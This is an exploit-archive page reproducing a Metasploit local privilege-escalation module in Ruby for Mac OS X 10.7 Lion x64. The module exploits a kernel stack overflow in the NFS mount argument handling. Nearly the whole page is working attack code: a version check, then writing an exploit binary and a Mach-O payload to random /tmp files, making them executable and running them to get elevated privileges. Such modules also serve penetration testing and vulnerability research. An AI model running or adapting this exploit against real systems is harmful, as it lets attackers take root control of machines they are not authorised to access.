Advertisement






Mac OS X 10.7 Lion x64 NFS Mount Privilege Escalation

CVE Category Price Severity
N/A CWE-269 N/A High
Author Risk Exploitation Type Date
Unknown High Local 2014-04-28
CPE
cpe:cpe:/o:apple:mac_os_x:10.7
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014040174

Below is a copy:

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Mac OS X NFS Mount Privilege Escalation Exploit',
      'Description'   => %q{
        This exploit leverage a stack overflow vulnerability to escalate privileges.
        The vulnerable function nfs_convert_old_nfs_args does not verify the size
        of a user-provided argument before copying it to the stack. As a result by
        passing a large size, a local user can overwrite the stack with arbitrary
        content.

        Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Kenzley Alphonse', # discovery and a very well-written exploit
          'joev' # msf module
        ],
      'References'    =>
        [
          [ 'EDB', '32813' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => [ ARCH_X86_64 ],
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.7 Lion x64 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X86_64
          }
        ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Apr 11 2014'
    ))
  end

  def check
    if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8"
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
    file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')
    exploit = File.read(file)
    pload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

    print_status "Writing temp file... #{tmpfile}"
    write_file(tmpfile, exploit)
    register_file_for_cleanup(tmpfile)

    print_status "Writing payload file... #{payloadfile}"
    write_file(payloadfile, pload)
    register_file_for_cleanup(payloadfile)

    print_status "Executing payload..."
    cmd_exec("chmod +x #{tmpfile}")
    cmd_exec("chmod +x #{payloadfile}")
    cmd_exec("#{tmpfile} #{payloadfile}")
  end

  def xnu_ver
    m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/)
    m && m[1]
  end

  def ver_lt(a, b)
    Gem::Version.new(a.gsub(/~.*?$/,'')) < Gem::Version.new(b.gsub(/~.*?$/,''))
  end

end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum